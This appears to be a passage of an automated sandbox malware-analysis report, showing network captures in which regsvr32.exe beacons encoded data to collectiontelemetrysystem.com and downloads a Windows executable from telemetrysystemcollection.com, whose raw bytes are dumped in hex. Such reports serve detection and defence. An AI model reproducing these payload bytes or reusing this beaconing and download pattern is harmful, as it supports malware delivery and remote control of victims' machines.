76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Jun 16, 2022 20:23:24.575650930 CEST	1267	IN	HTTP/1.1 200 OK Date: Thu, 16 Jun 2022 18:23:24 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.4 X-Powered-By: PHP/8.1.4 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 48 63 43 49 36 49 6e 70 42 59 7a 30 69 66 51 3d 3d Data Ascii: eyJHcCI6InpBYz0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49189	213.226.114.15	48195	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 20:23:24.808119059 CEST	1268	OUT	POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: collectiontelemetrysystem.com Content-Length: 231 Content-Type: application/x-www-form-urlencoded Accept-Language: en-RUS Data Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Jun 16, 2022 20:23:25.010498047 CEST	1269	IN	HTTP/1.1 200 OK Date: Thu, 16 Jun 2022 18:23:24 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.4 X-Powered-By: PHP/8.1.4 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 48 63 43 49 36 49 6e 70 42 59 7a 30 69 66 51 3d 3d Data Ascii: eyJHcCI6InpBYz0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49190	213.226.114.15	48195	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 20:23:25.267841101 CEST	1270	OUT	POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: collectiontelemetrysystem.com Content-Length: 231 Content-Type: application/x-www-form-urlencoded Accept-Language: en-RUS Data Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Jun 16, 2022 20:23:25.501609087 CEST	1270	IN	HTTP/1.1 200 OK Date: Thu, 16 Jun 2022 18:23:25 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.4 X-Powered-By: PHP/8.1.4 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 48 63 43 49 36 49 6e 70 42 59 7a 30 69 66 51 3d 3d Data Ascii: eyJHcCI6InpBYz0ifQ==

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49180	213.226.114.15	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-06-16 18:22:58 UTC	0	OUT	GET /m8YYdu/mCQ2U9/auth.aspx HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: telemetrysystemcollection.com Cache-Control: no-cache
2022-06-16 18:22:58 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 16 Jun 2022 18:22:58 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.4 Last-Modified: Tue, 14 Jun 2022 10:57:13 GMT ETag: "64400-5e166445c61b2" Accept-Ranges: bytes Content-Length: 410624 Connection: close
2022-06-16 18:22:58 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 74 07 be 6a 30 66 d0 39 30 66 d0 39 30 66 d0 39 24 0d d3 38 3a 66 d0 39 24 0d d5 38 ba 66 d0 39 24 0d d4 38 22 66 d0 39 62 13 d5 38 11 66 d0 39 62 13 d4 38 3f 66 d0 39 62 13 d3 38 25 66 d0 39 24 0d d1 38 21 66 d0 39 30 66 d1 39 53 66 d0 39 68 13 d5 38 35 66 d0 39 68 13 d0 38 31 66 d0 39 68 13 d2 38 31 66 d0 39 52 69 63 68 30 66 d0 39 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$tj0f90f90f9$8:f9$8f9$8"f9b8f9b8?f9b8%f9$8!f90f9Sf9h85f9h81f9h81f9Rich0f9PEL
2022-06-16 18:22:58 UTC	8	IN	Data Raw: 10 01 0f 57 c0 66 0f 13 45 f0 eb 12 8b 55 f0 83 c2 01 8b 45 f4 83 d0 00 89 55 f0 89 45 f4 83 7d f4 00 77 43 72 06 83 7d f0 0c 73 3b 6a 00 6a 01 8b 4d f4 51 8b 55 f0 52 e8 9f 7a 04 00 8b f0 b8 01 00 00 00 6b c8 00 8d 7c 0d e4 6a 00 6a 01 8b 55 f4 52 8b 45 f0 50 e8 80 7a 04 00 8a 0c 37 88 88 b0 4d 06 10 eb a5 68 40 b0 05 10 e8 47 7a 04 00 83 c4 04 b8 b0 4d 06 10 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 1c 56 57 89 4d fc c7 45 f8 0b 00 00 00 c6 45 e4 9a c6 45 e5 b6 c6 45 e6 9e c6 45 e7 64 c6 45 e8 6d c6 45 e9 68 c6 45 ea 2f c6 45 eb 65 c6 45 ec a1 c6 45 ed b1 c6 45 ee ed a1 3c 4e 06 10 83 e0 01 0f 85 88 00 00 00 8b 0d 3c 4e 06 10 83 c9 01 89 0d 3c 4e 06 10 c6 05 3b 4e 06 10 01 0f 57 c0 66 0f 13 45 f0 eb 12 8b 55 f0 83 c2 01 8b Data Ascii: WfEUEUE}wCr}s;jjMQURzk\|jjUREPz7Mh@GzM_^]UVWMEEEEEdEmEhE/EeEEE<N<N<N;NWfEU
2022-06-16 18:22:58 UTC	24	IN	Data Raw: 4c fb ff ff 03 04 91 89 85 14 fe ff ff 8b 95 14 fe ff ff 89 95 90 fe ff ff eb 45 e9 f0 fe ff ff 8b 85 94 fe ff ff 89 85 10 fe ff ff 8b 8d 10 fe ff ff 8b 11 89 95 0c fe ff ff 8b 85 0c fe ff ff 89 85 94 fe ff ff c6 45 f3 01 0f b6 4d f3 85 c9 0f 85 14 fe ff ff c7 85 90 fe ff ff 00 00 00 00 8d 95 08 fe ff ff 89 95 04 fe ff ff 8b 85 04 fe ff ff 8b 08 89 8d 00 fe ff ff 8b 95 00 fe ff ff 52 ff 95 90 fe ff ff 89 85 fc fd ff ff 83 bd fc fd ff ff 00 75 49 33 c0 88 45 f2 6a 00 68 dc c1 05 10 e8 45 b4 ff ff 89 85 f4 fd ff ff 8d 4d f2 e8 17 d5 ff ff 89 85 58 fe ff ff 8b 8d 58 fe ff ff e8 a6 8a 00 00 8b 8d 58 fe ff ff 89 8d f8 fd ff ff 8b 95 f8 fd ff ff 52 ff 95 f4 fd ff ff 33 c0 88 45 f1 8d 4d f1 e8 e0 e3 ff ff 89 85 34 fe ff ff 8b 8d 34 fe ff ff e8 2f 8b 00 00 8b 8d Data Ascii: LEEMRuI3EjhEMXXXR3EM44/
2022-06-16 18:22:58 UTC	40	IN	Data Raw: 6a 00 68 f8 c1 05 10 e8 b0 74 ff ff 89 85 f4 f6 ff ff 8d 8d 02 f6 ff ff 51 8d 4d f1 e8 db 7c ff ff 89 85 74 ff ff ff c7 85 78 ff ff ff 00 00 00 00 eb 0f 8b 95 78 ff ff ff 83 c2 01 89 95 78 ff ff ff 83 bd 78 ff ff ff 0f 73 78 8b 85 74 ff ff ff 83 c0 02 89 85 14 f7 ff ff 8b 8d 78 ff ff ff 8b 95 14 f7 ff ff 8d 04 4a 89 85 10 f7 ff ff 8b 8d 74 ff ff ff 0f be 11 8b 85 10 f7 ff ff 0f b7 08 33 ca 66 89 8d 6e fd ff ff 8b 95 74 ff ff ff 83 c2 02 89 95 0c f7 ff ff 8b 85 78 ff ff ff 8b 8d 0c f7 ff ff 8d 14 41 89 95 08 f7 ff ff 8b 85 08 f7 ff ff 66 8b 8d 6e fd ff ff 66 89 08 e9 70 ff ff ff 8b 95 74 ff ff ff 83 c2 02 89 95 04 f7 ff ff b8 0f 00 00 00 d1 e0 03 85 04 f7 ff ff 89 85 00 f7 ff ff 33 c9 8b 95 00 f7 ff ff 66 89 0a 8b 85 74 ff ff ff 83 c0 02 89 85 fc f6 ff ff Data Ascii: jhtQM\|txxxxsxtxJt3fntxAfnfpt3ft
2022-06-16 18:22:58 UTC	56	IN	Data Raw: c4 03 8d cc fd ff ff 89 4d b4 8b 95 d0 fd ff ff 89 55 b8 8b 45 b4 3b 45 b0 74 0c c7 85 3c ff ff ff 01 00 00 00 eb 0a c7 85 3c ff ff ff 00 00 00 00 8a 8d 3c ff ff ff 88 4d f0 0f b6 55 f0 85 d2 0f 84 01 01 00 00 8b 45 b4 8b 48 18 89 4d e4 8b 55 e4 89 95 08 fe ff ff 8b 45 e4 83 e8 01 89 45 e4 83 bd 08 fe ff ff 00 0f 84 d9 00 00 00 8b 4d b4 8b 55 b0 03 51 20 8b 45 b0 8b 4d e4 03 04 8a 89 85 04 fe ff ff 8b 95 04 fe ff ff 89 95 58 ff ff ff c7 85 54 ff ff ff c5 9d 1c 81 8b 85 58 ff ff ff 8a 08 88 4d ef 8b 95 58 ff ff ff 83 c2 01 89 95 58 ff ff ff 8a 45 ef 88 45 fc 0f be 4d fc 85 c9 75 0e 8b 95 54 ff ff ff 89 95 00 fe ff ff eb 19 0f be 45 fc 33 85 54 ff ff ff b9 93 01 00 01 f7 e1 89 85 54 ff ff ff eb b1 81 bd 00 fe ff ff aa 12 cf af 75 4b 8b 55 b4 8b 45 b0 03 42 Data Ascii: MUE;Et<<<MUEHMUEEMUQ EMXTXMXXEEMuTE3TTuKUEB
2022-06-16 18:22:58 UTC	72	IN	Data Raw: ff ff 03 95 d4 fe ff ff 89 95 28 fd ff ff 8b 85 38 fd ff ff 0f af 85 24 ff ff ff 89 45 a4 8b 8d 54 ff ff ff 0f af 8d 0c fe ff ff 89 4d f0 8b 95 04 ff ff ff 3b 55 98 7c 0f 8b 85 c4 fe ff ff 03 45 e4 89 85 9c fd ff ff 8b 4d c0 0f af 8d 3c ff ff ff 89 8d 9c fe ff ff 8b 55 f4 3b 55 e8 7f 12 8b 85 d4 fa ff ff 03 85 a8 fd ff ff 89 85 30 fd ff ff 8b 8d f4 fd ff ff 0f af 8d 50 ff ff ff 89 8d 58 fe ff ff 8b 55 e4 0f af 95 04 fe ff ff 89 95 48 fe ff ff 8b 85 78 fb ff ff 3b 45 f0 7f 0f 8b 8d 6c fe ff ff 03 8d 94 fd ff ff 89 4d cc 8b 95 28 ff ff ff 3b 95 b0 fa ff ff 7f 0f 8b 85 4c ff ff ff 03 45 80 89 85 20 fd ff ff 8b 8d 54 fc ff ff 3b 8d 3c fe ff ff 7c 0f 8b 95 cc fa ff ff 03 95 34 ff ff ff 89 55 b4 8b 85 4c fd ff ff 0f af 85 b0 fd ff ff 89 85 3c fb ff ff 8b 8d 7c Data Ascii: (8$ETM;U\|EM<U;U0PXUHx;ElM(;LE T;<\|4UL<\|
2022-06-16 18:22:58 UTC	88	IN	Data Raw: ec 7f 0f 8b 95 24 fe ff ff 03 55 c4 89 95 58 ff ff ff 8b 85 c4 fd ff ff 3b 85 40 fa ff ff 7f 0f 8b 8d 68 fc ff ff 03 8d e8 fe ff ff 89 4d e4 8b 95 3c ff ff ff 0f af 95 3c fe ff ff 89 95 bc fb ff ff 8b 85 58 ff ff ff 3b 85 30 fa ff ff 7f 12 8b 8d d4 fe ff ff 03 8d b4 fb ff ff 89 8d 0c fe ff ff 8b 95 bc fc ff ff 0f af 55 c4 89 55 f0 8b 85 5c ff ff ff 0f af 85 2c ff ff ff 89 85 14 fe ff ff 8b 4d f0 0f af 8d 3c ff ff ff 89 4d a4 8b 95 70 fe ff ff 3b 95 dc fe ff ff 7f 12 8b 85 f8 fd ff ff 03 85 10 fd ff ff 89 85 84 f9 ff ff 8b 8d 40 ff ff ff 3b 8d 10 fe ff ff 7f 0c 8b 55 e4 03 95 84 fd ff ff 89 55 f0 8b 85 dc fd ff ff 3b 85 44 fe ff ff 7c 12 8b 8d a4 fe ff ff 03 8d 88 f9 ff ff 89 8d 6c fc ff ff 8b 95 04 fc ff ff 3b 55 a4 7f 0c 8b 45 d0 03 45 e4 89 85 fc fc ff Data Ascii: $UX;@hM<<X;0UU\,M<Mp;@;UU;D\|l;UEE
2022-06-16 18:22:58 UTC	104	IN	Data Raw: 08 83 c0 2e 89 85 24 fb ff ff 8b 4d 08 81 c1 4b 01 00 00 89 8d 20 fb ff ff 8b 55 08 81 c2 14 01 00 00 89 95 1c fb ff ff 8b 45 08 05 12 01 00 00 89 85 18 fb ff ff 8b 4d 08 81 c1 cd 01 00 00 89 8d dc fd ff ff 8b 55 08 81 c2 d8 00 00 00 89 95 50 ff ff ff 8b 45 08 05 4c 01 00 00 89 85 14 fb ff ff 8b 4d 08 83 c1 46 89 8d 4c ff ff ff 8b 55 08 81 c2 74 01 00 00 89 95 10 fb ff ff 8b 45 08 83 c0 35 89 85 0c fb ff ff 8b 4d 08 81 c1 d3 00 00 00 89 8d 08 fb ff ff 8b 55 08 81 c2 30 01 00 00 89 55 cc 8b 45 08 83 c0 64 89 85 04 fb ff ff 8b 4d 08 83 c1 7d 89 8d d8 fd ff ff 8b 55 08 81 c2 e8 01 00 00 89 95 d4 fd ff ff 8b 45 08 05 21 01 00 00 89 85 00 fb ff ff 8b 4d 08 81 c1 cd 01 00 00 89 8d 48 ff ff ff 8b 55 08 81 c2 0b 01 00 00 89 95 fc fa ff ff 8b 45 08 05 7d 01 00 00 Data Ascii: .$MK UEMUPELMFLUtE5MU0UEdM}UE!MHUE}
2022-06-16 18:22:58 UTC	120	IN	Data Raw: ff ff 8b 45 08 83 c0 63 89 85 04 f9 ff ff 8b 4d 08 83 c1 2c 89 8d 64 ff ff ff 8b 55 08 81 c2 26 01 00 00 89 95 04 fd ff ff 8b 45 08 83 c0 79 89 85 88 fe ff ff 8b 4d 08 81 c1 90 01 00 00 89 8d 00 fd ff ff 8b 55 08 81 c2 79 01 00 00 89 95 74 fb ff ff 8b 45 08 83 c0 21 89 85 fc fc ff ff 8b 4d 08 83 c1 04 89 8d 84 fe ff ff 8b 55 08 81 c2 e7 00 00 00 89 95 60 ff ff ff 8b 45 08 83 c0 12 89 85 f8 fc ff ff 8b 4d 08 81 c1 60 01 00 00 89 8d bc f9 ff ff 8b 55 08 81 c2 98 00 00 00 89 95 70 fb ff ff 8b 45 08 05 9b 01 00 00 89 85 5c ff ff ff 8b 4d 08 83 c1 2e 89 8d 80 fe ff ff 8b 55 08 81 c2 4a 01 00 00 89 95 6c fb ff ff 8b 45 08 05 87 00 00 00 89 85 f4 fc ff ff 8b 4d 08 81 c1 8c 00 00 00 89 8d 58 ff ff ff 8b 55 08 83 c2 1b 89 95 68 fb ff ff 8b 45 08 05 d1 01 00 00 89 Data Ascii: EcM,dU&EyMUytE!MU`EM`UpE\M.UJlEMXUhE
2022-06-16 18:22:58 UTC	136	IN	Data Raw: 00 00 89 95 74 ff ff ff 8b 45 08 05 c7 01 00 00 89 85 ec fb ff ff 8b 4d 08 81 c1 74 01 00 00 89 8d 70 ff ff ff 8b 55 08 83 c2 02 89 95 e4 f9 ff ff 8b 45 08 05 54 01 00 00 89 85 bc fd ff ff 8b 4d 08 81 c1 77 01 00 00 89 8d b8 fd ff ff 8b 55 08 81 c2 b7 00 00 00 89 55 c8 8b 45 08 05 6b 01 00 00 89 85 00 f9 ff ff 8b 4d 08 81 c1 ca 01 00 00 89 8d e0 f9 ff ff 8b 55 08 81 c2 29 01 00 00 89 95 fc f8 ff ff 8b 45 08 05 77 01 00 00 89 85 b4 fd ff ff 8b 4d 08 81 c1 ee 00 00 00 89 8d e8 fb ff ff 8b 55 08 81 c2 dd 01 00 00 89 95 f8 f8 ff ff 8b 45 08 05 be 00 00 00 89 85 e4 fb ff ff 8b 4d 08 81 c1 2c 01 00 00 89 8d e0 fb ff ff 8b 55 08 81 c2 b8 01 00 00 89 95 f4 f8 ff ff 8b 45 08 83 c0 1c 89 85 dc f9 ff ff 8b 4d 08 81 c1 65 01 00 00 89 8d dc fb ff ff 8b 55 08 83 c2 2a Data Ascii: tEMtpUETMwUUEkMU)EwMUEM,UEMeU*
2022-06-16 18:22:58 UTC	152	IN	Data Raw: 85 5c ff ff ff 89 85 1c fd ff ff 8b 8d 7c f9 ff ff 0f af 8d 28 ff ff ff 89 8d 04 ff ff ff 8b 55 a8 3b 95 44 fc ff ff 7c 12 8b 85 08 ff ff ff 03 85 a4 fe ff ff 89 85 c4 fd ff ff 8b 8d 68 ff ff ff 3b 8d 40 fd ff ff 7f 0f 8b 95 5c fe ff ff 03 55 98 89 95 a0 fc ff ff 8b 85 28 fc ff ff 0f af 85 e8 fc ff ff 89 85 c8 fe ff ff 8b 8d d0 fe ff ff 3b 8d 40 fb ff ff 7c 12 8b 95 bc fa ff ff 03 95 7c ff ff ff 89 95 e0 fd ff ff 8b 85 58 fb ff ff 3b 85 5c fb ff ff 7c 0f 8b 8d a4 fe ff ff 03 8d 74 fd ff ff 89 4d bc 8b 95 20 fe ff ff 3b 95 bc fb ff ff 7f 12 8b 85 3c fc ff ff 03 85 88 fd ff ff 89 85 84 fc ff ff 8b 4d ec 3b 8d c0 fb ff ff 7f 12 8b 95 a8 fa ff ff 03 95 00 fd ff ff 89 95 28 fe ff ff 8b 85 84 fe ff ff 3b 85 a0 fd ff ff 7c 12 8b 8d a4 fb ff ff 03 8d ac fd ff ff Data Ascii: \\|(U;D\|h;@\U(;@\|\|X;\\|tM ;<M;(;\|
2022-06-16 18:22:58 UTC	168	IN	Data Raw: 85 4c fe ff ff 8b 8d 54 ff ff ff 0f af 8d f0 fe ff ff 89 8d 70 ff ff ff 8b 95 84 fb ff ff 3b 95 78 fd ff ff 7c 0f 8b 85 94 fe ff ff 03 45 a4 89 85 54 fb ff ff 8b 8d 9c fd ff ff 3b 4d e4 7f 12 8b 95 f0 fa ff ff 03 95 60 fe ff ff 89 95 e0 fe ff ff 8b 85 5c fe ff ff 3b 45 d8 7f 12 8b 8d 38 fd ff ff 03 8d fc fe ff ff 89 8d f4 fc ff ff 8b 95 d8 fd ff ff 3b 55 90 7f 12 8b 85 80 fe ff ff 03 85 4c ff ff ff 89 85 ac fb ff ff 8b 4d d4 0f af 8d fc fa ff ff 89 4d 88 8b 95 24 ff ff ff 3b 95 68 ff ff ff 7c 12 8b 85 40 fe ff ff 03 85 08 ff ff ff 89 85 0c ff ff ff 8b 8d 38 ff ff ff 3b 8d f0 fe ff ff 7c 0f 8b 95 b4 fd ff ff 03 55 c0 89 95 00 fe ff ff 8b 85 c8 fd ff ff 3b 45 ac 7c 09 8b 4d c8 03 4d fc 89 4d 80 8b 95 8c fe ff ff 3b 95 d0 fa ff ff 7c 12 8b 85 60 ff ff ff 03 Data Ascii: LTp;x\|ET;M`\;E8;ULMM$;h\|@8;\|U;E\|MMM;\|`
2022-06-16 18:22:58 UTC	184	IN	Data Raw: ff 89 85 f4 fe ff ff 8b 8d f8 fe ff ff 3b 4d ec 7c 12 8b 95 14 fe ff ff 03 95 38 fd ff ff 89 95 78 ff ff ff 8b 85 bc fd ff ff 3b 45 dc 7f 12 8b 8d 74 ff ff ff 03 8d 24 fe ff ff 89 8d 6c ff ff ff 8b 95 d4 fe ff ff 0f af 95 ec fe ff ff 89 95 cc fe ff ff 8b 85 08 ff ff ff 0f af 85 70 fc ff ff 89 85 d8 fb ff ff 8b 8d 80 fd ff ff 0f af 8d bc fe ff ff 89 8d c0 fc ff ff 8b 95 2c fe ff ff 0f af 95 0c ff ff ff 89 95 04 ff ff ff 8b 85 98 fc ff ff 3b 45 cc 7f 12 8b 8d f4 fe ff ff 03 8d 00 ff ff ff 89 8d e4 fe ff ff 8b 95 44 fc ff ff 3b 55 80 7f 12 8b 85 a8 fc ff ff 03 85 e0 fe ff ff 89 85 d4 fc ff ff 8b 8d ac fa ff ff 0f af 8d 7c ff ff ff 89 8d 8c fb ff ff 8b 55 b0 3b 55 b4 7f 0f 8b 45 8c 03 85 a4 fa ff ff 89 85 e8 f9 ff ff 8b 8d 50 fd ff ff 3b 8d 60 fd ff ff 7c 12 Data Ascii: ;M\|8x;Et$lp,;ED;U\|U;UEP;`\|
2022-06-16 18:22:58 UTC	200	IN	Data Raw: 95 f8 fe ff ff 8b 45 08 83 c0 46 89 85 f4 fe ff ff 8b 4d 08 81 c1 fb 00 00 00 89 8d 84 fc ff ff 8b 55 08 81 c2 0f 01 00 00 89 95 80 fc ff ff 8b 45 08 83 c0 75 89 85 7c fc ff ff 8b 4d 08 81 c1 95 01 00 00 89 8d 64 f9 ff ff 8b 55 08 81 c2 68 01 00 00 89 55 8c 8b 45 08 05 e8 00 00 00 89 85 78 fc ff ff 8b 4d 08 83 c1 65 89 8d 74 fc ff ff 8b 55 08 81 c2 06 01 00 00 89 95 10 fe ff ff 8b 45 08 83 c0 50 89 85 60 f9 ff ff 8b 4d 08 81 c1 3b 01 00 00 89 8d 0c fe ff ff 8b 55 08 81 c2 b0 01 00 00 89 95 5c f9 ff ff 8b 45 08 05 ba 01 00 00 89 45 cc 8b 4d 08 81 c1 ad 01 00 00 89 8d 08 fe ff ff 8b 55 08 83 c2 74 89 95 70 fc ff ff 8b 45 08 05 e4 01 00 00 89 85 6c fc ff ff 8b 4d 08 81 c1 e4 00 00 00 89 8d a4 fa ff ff 8b 55 08 81 c2 72 01 00 00 89 95 a0 fa ff ff 8b 45 08 83 Data Ascii: EFMUEu\|MdUhUExMetUEP`M;U\EEMUtpElMUrE
2022-06-16 18:22:58 UTC	216	IN	Data Raw: 00 00 89 85 50 f9 ff ff 8b 4d 08 83 c1 3d 89 8d 4c f9 ff ff 8b 55 08 81 c2 a7 01 00 00 89 95 04 fc ff ff 8b 45 08 05 9e 00 00 00 89 85 c8 fe ff ff 8b 4d 08 81 c1 5c 01 00 00 89 8d c4 fe ff ff 8b 55 08 81 c2 d7 00 00 00 89 95 c0 fe ff ff 8b 45 08 05 95 00 00 00 89 85 64 fd ff ff 8b 4d 08 81 c1 61 01 00 00 89 8d 60 fd ff ff 8b 55 08 81 c2 8a 00 00 00 89 95 bc fe ff ff 8b 45 08 05 ef 01 00 00 89 85 b8 fe ff ff 8b 4d 08 81 c1 a4 01 00 00 89 8d b4 fe ff ff 8b 55 08 83 c2 1d 89 95 00 fc ff ff 8b 45 08 05 cf 00 00 00 89 85 5c fd ff ff 8b 4d 08 83 c1 5e 89 8d 8c fa ff ff 8b 55 08 83 c2 16 89 55 f0 8b 45 08 83 c0 55 89 85 58 fd ff ff 8b 4d 08 81 c1 bc 00 00 00 89 8d 88 fa ff ff 8b 55 08 81 c2 8b 00 00 00 89 55 c4 8b 45 08 05 25 01 00 00 89 85 84 fa ff ff 8b 4d 08 Data Ascii: PM=LUEM\UEdMa`UEMUE\M^UUEUXMUUE%M
2022-06-16 18:22:58 UTC	232	IN	Data Raw: 45 08 83 c0 05 89 85 20 fc ff ff 8b 4d 08 83 c1 3b 89 8d 1c fc ff ff 8b 55 08 81 c2 e6 01 00 00 89 95 98 fd ff ff 8b 45 08 05 b9 01 00 00 89 85 18 fc ff ff 8b 4d 08 81 c1 bb 00 00 00 89 8d 74 ff ff ff 8b 55 08 81 c2 cf 00 00 00 89 95 14 fc ff ff 8b 45 08 05 a4 00 00 00 89 85 5c fa ff ff 8b 4d 08 83 c1 79 89 8d d4 fe ff ff 8b 55 08 81 c2 e6 01 00 00 89 95 70 ff ff ff 8b 45 08 05 8b 00 00 00 89 85 3c f9 ff ff 8b 4d 08 83 c1 12 89 4d d0 8b 55 08 81 c2 85 00 00 00 89 95 d0 fe ff ff 8b 45 08 83 c0 5b 89 85 10 fc ff ff 8b 4d 08 81 c1 b8 00 00 00 89 8d 38 f9 ff ff 8b 55 08 81 c2 5b 01 00 00 89 95 94 fd ff ff 8b 45 08 05 b1 01 00 00 89 85 90 fd ff ff 8b 4d 08 81 c1 e3 01 00 00 89 8d 58 fa ff ff 8b 55 08 81 c2 72 01 00 00 89 95 0c fc ff ff 8b 45 08 83 c0 2a 89 85 Data Ascii: E M;UEMtUE\MyUpE<MMUE[M8U[EMXUrE*
